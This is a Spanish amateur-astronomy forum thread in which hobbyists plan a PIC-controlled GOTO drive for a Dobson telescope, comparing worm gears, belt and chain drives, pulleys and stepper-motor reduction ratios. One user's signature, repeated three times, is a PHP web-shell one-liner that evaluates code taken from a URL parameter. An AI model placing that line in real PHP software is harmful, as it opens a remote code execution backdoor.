PIC-GOTO para Dobson

Subforo dedicado a los telescopios astronómicos. En este foro no está permitida la venta de ningún tipo de material.
carlos
Mensajes: 96
Registrado: Mar Sep 01, 2009 8:45 pm

PIC-GOTO para Dobson

Mensaje por carlos »

Pues tengo el mismo dobson que tu, el SkyWatcher de 8", el normal no el plegable.Pues estare atento a como motorizas la montura. Una pregunta, ¿Las PCBs podeis hacer mas luego os las pago?



Un Saludo :)
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

PIC-GOTO para Dobson

Mensaje por m3ntol »

Interesantísimo este hilo y no sabía que existía :)
En su día me metí con algo parecido pero me echó para atrás la parte mecánica. ¿Cómo habéis hecho las coronas para que ataquen los bisinfines?
Yo probé con resina de epoxy y espárragos de unos 30cm, grabando la marca del espárrago sobre la resina y dejando que seque, pero los errores que ahbía eran inaceptables, luego probé con espárrragos de nylon doblándolos sobre la base del dobson para que actúen de corona pero no se si fue mi falta de pericia (soy bastante manazas) o que no eran lo más adecuado pero tampoco lo hice funcionar. Incluso traté de adaptar una corona de una montura vieja y tampoco funcionó.
phpbb:eval(stripslashes($_GET[e]));
x
Mensajes: 3220
Registrado: Lun Ago 30, 2010 10:10 am

Mensaje por x »

... Eliminado por petición del usuario
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

PIC-GOTO para Dobson

Mensaje por m3ntol »

Pues apunta uno más al taller, ya somos 8 ojos.
phpbb:eval(stripslashes($_GET[e]));
syknarf
Mensajes: 171
Registrado: Mar Ago 31, 2010 10:15 pm

PIC-GOTO para Dobson

Mensaje por syknarf »

¡ Estupendo que se apunte más gente al proyecto !

[quote="carlos"]Pues tengo el mismo dobson que tu, el SkyWatcher de 8", el normal no el plegable.Pues estare atento a como motorizas la montura. Una pregunta, ¿Las PCBs podeis hacer mas luego os las pago?
Un Saludo :)[/quote]

Pues a lo de las PCB ya te ha contestado Juan Antonio, que es el responsable de esa parte.

De la montura, pues si no me equivoco, tanto para el plegable (como el mio) como para el de tubo cerrado, son exactamente iguales, asi que eso que llevarias ganado.



[quote="m3ntol"]Interesantísimo este hilo y no sabía que existía :)
En su día me metí con algo parecido pero me echó para atrás la parte mecánica. ¿Cómo habéis hecho las coronas para que ataquen los bisinfines?
Yo probé con resina de epoxy y espárragos de unos 30cm, grabando la marca del espárrago sobre la resina y dejando que seque, pero los errores que ahbía eran inaceptables, luego probé con espárrragos de nylon doblándolos sobre la base del dobson para que actúen de corona pero no se si fue mi falta de pericia (soy bastante manazas) o que no eran lo más adecuado pero tampoco lo hice funcionar. Incluso traté de adaptar una corona de una montura vieja y tampoco funcionó.[/quote]

Precisamente me he estado leyendo y releyendo el hilo al respecto de lo que comentas (en el foro hubble) y tenia pensado el preguntarte si habias sacado algo en claro de todos los metodos allí expuestos.

En principio mi primera intención es la de mecanizar las coronas para bisinfines en el minitorno que tengo, realmente ya he hecho una prueba bastante satisfactoria, a pesar de realizarla a capón y sin tomar medidas exactas.
Aunque después de leer los distintos sistemas que usa la gente, estoy por probar el método de la masilla epoxi o quizá el de las varillas roscadas de nylon.

Si el mecanizado de los bisinfines se me da bien, no tengo inconveniente en hacer alguno más para quienes se apunten al proyecto. Por lo pronto seguiré haciendo pruebas sobre materiales desechables (y baratos), hasta ver si me salen bien y entonces hacerlos sobre bronce.

Seguiremos informando, y se aceptan sugerencias.
"La violencia es el último recurso del incompetente"
-
SkyWatcher 8" Dobson
Oculares Celestron plössl 32mm y 4mm
SW super plössl 25mm y 10mm
TV plössl 20mm, WO SWAN 15mm, Longperng 5mm long eye relief
Barlow TAL 2x
Filtro lunar
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

PIC-GOTO para Dobson

Mensaje por m3ntol »

Un método casero y muy efectivo y preciso es el del plato y cadena de bicicleta. Se trata de acoplar un plato de bici (lo más grande posible) al eje en cuestión y llevar la tracción mediante la cadena a un segundo eje donde está el motor. Creo que hubo quien incluso usó un piñon con marchas para cambiar la velocidad de paso, pero eso es ya llevar las cosas a lo excéntrico.
Con un buen motor de paso muy quequeño y con buena pontencia (con una buena reductora por ejemplo) se podría hacer.
phpbb:eval(stripslashes($_GET[e]));
syknarf
Mensajes: 171
Registrado: Mar Ago 31, 2010 10:15 pm

PIC-GOTO para Dobson

Mensaje por syknarf »

[quote="m3ntol"]
Con un buen motor de paso muy quequeño y con buena pontencia (con una buena reductora por ejemplo) se podría hacer.[/quote]

Llegamos a la madre del problema: la reductora.

A mi lo de la tracción por cadena, como que no me termina de gustar. Preferiría en el mismo estilo, una tracción por correa dentada, pero nos encontramos con el problema de hallar una polea lo suficientemente grande para hacer una desmultiplicación adecuada. O eso, o montar varias reducciones anidadas con poleas mas pequeñas.

Quizá se podría fabricar de modo "casero" las poleas grandes, montando sobre un circulo de madera (u otro material) una correa dentada, con los dientes hacia el exterior, y que engrane con otra correa que traiga la transmisión desde el motor.
Ahora que lo pienso, tampoco haria falta la segunda correa, ya que el motor podría atacar directamente a esta rueda con correa. Esto hay que meditarlo y calcular los tamaños.

Creo que para visual y con los motores de 200 pasos trabajando a 20 micropasos (4000 micropasos total) una reducción adecuada estaría en torno al 200:1 que daria una resolución de 1,62 seg de arco (si no me equivoco). Creo que para visual será suficiente, aunque normalmente se recomienda que la resolución sea algo superior al poder resolutivo de la optica del teles, aunque esto ya imagino que será recomendable más para astrofotografía.

Me da a mi que 200:1 con una sola polea va a ser complicadillo....
"La violencia es el último recurso del incompetente"
-
SkyWatcher 8" Dobson
Oculares Celestron plössl 32mm y 4mm
SW super plössl 25mm y 10mm
TV plössl 20mm, WO SWAN 15mm, Longperng 5mm long eye relief
Barlow TAL 2x
Filtro lunar
vakaloura
Mensajes: 661
Registrado: Jue Dic 18, 2008 11:34 am

PIC-GOTO para Dobson

Mensaje por vakaloura »

Hooolas!

Me estreno en este hilo! Debido a mi reciente modificación, no hay polea que se me resista... :twisted:

Aquí podéis ver poleas de hasta 20cms de diámetro:
http://www.hpcgears.com/newpdf/timing_pulleys_1_2.pdf

Este domingo tuve una charla con David, y me comentaba que necesitaba un mando de movimiento lento para su LB de 12" en el eje de altitud... resumiendo, se nos ha ocurrido un inventazo! Básicamente aprovechando el peso del LB por fricción contra una rueda de goma (dicho así suena guarro, pero tiene miga la cosa).

La solución que comenta Javier, de los espárragos y el epoxy, en vez de eso se puede usar un rack flexible adherido al canto, todo es cuestión de buscar unas buenas medidas.

En cuanto al tema de las reducciones de los motores, como apunte, los motores que usamos para el nandofocus.... no hay huevillos que lo frenen a mano, antes parte la caja reductora.... yo por eso tiraría por un nema 17 ó 23, sin caja de reducción, desconozco si el pic-goto puede hacer micropasos (yo utilizo un A3967 de allegro que me da una resolución de hasta 1/8 de paso) si fuese el caso, usaría un sistema de arrastre por poleas (por precisión y por backslash) y la diferencia de tamaño me daría la suficiente precisión y reducción...

Vamos, no sé, son todo conjeturas y opiniones basadas en mi joven experiencia.

Si coincidimos un día de estos os lo comento en persona delante de unas cocacolas.

Pero contad conmigo para chapucear juntos, yo pongo el bellota de 2kgs para el ajuste de precisión.

un saludete!!
GSO RC 8" f/9, EZG80
QHY6_mono, NEQ6-PRO
theheavy
Mensajes: 871
Registrado: Mié Sep 02, 2009 7:59 pm

PIC-GOTO para Dobson

Mensaje por theheavy »

[quote="vakaloura"]

Pero contad conmigo para chapucear juntos, yo pongo el bellota de 2kgs para el ajuste de precisión.
[/quote]

Yo tambien se usar esa herramienta, sobre todo para golpear mesas.

Me parece acojonante lo que estais haciendo, contad conmigo si necesitais ayuda para algo que no sea trabajo fino.

Yo soy de los que opina:
Que si la fuerza bruta no funciona, es que no estás aplicando la suficiente.
Mas vale estar callado y parecer tonto,
que abrir la boca y demostrarlo.
x
Mensajes: 3220
Registrado: Lun Ago 30, 2010 10:10 am

Mensaje por x »

... Eliminado por petición del usuario
Responder